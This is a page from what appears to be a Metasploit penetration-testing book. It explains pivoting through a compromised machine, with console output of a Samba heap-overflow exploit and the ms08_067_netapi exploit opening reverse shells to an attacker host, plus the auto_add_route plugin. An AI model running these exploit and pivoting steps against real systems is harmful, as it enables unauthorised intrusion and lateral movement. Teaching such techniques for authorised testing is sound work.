background image

Meterpreter

91

[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe411...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Trying to exploit Samba with address 0xffffe412...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (10.10.1.129:8080 -> 192.168.33.132:1608) 

Compare the 

LHOST

   and 

RHOST

   variables to the network information 

displayed by 

ifconfig

  . Our 

LHOST

 option specifies the IP address of our attack-

ing machine. Also notice, the 

RHOST

 option IP address is set to a different net-

work subnet and that we are attacking systems by tunneling our traffic through 
our compromised target to additional systems on the target’s network. We 
are leveraging the pivoting attack through Metasploit to pass communica-
tions through our exploited machine to the target machine that resides on 
the local subnet. In this case, if the heap overflow is successful, we should be 
presented with a reverse shell from 192.168.33.132, simply by leveraging the 
network communications on the already compromised machine. When we run 
the exploit with 

exploit

, we see at   that a connection is set up as expected 

on a different machine, not the Windows XP machine. Now, to port scan 
through the pivot, we would use the 

scanner/portscan/tcp

 scanner module, 

which is built to handle routing through Metasploit.

NOTE

You could also use the 

scanner/portscan/tcp

 scanner to conduct a series of port 

scans through your compromised target on the local subnet itself. We won’t go into the 
details here, but just know that you can perform port scanning on a compromised net-
work leveraging this module.

In the preceding examples, we used the 

route add

 command after we had 

compromised the system. Alternatively, to add the routes automatically to 
Meterpreter upon a new session spawn, we could use

 load auto_add_route

:

msf exploit(ms08_067_netapi) > 

load auto_add_route

[*] Successfully loaded plugin: auto_add_route

msf exploit(ms08_067_netapi) > 

exploit

[*] Started reverse handler on 10.10.1.129:443
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1090)
[*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 through session 1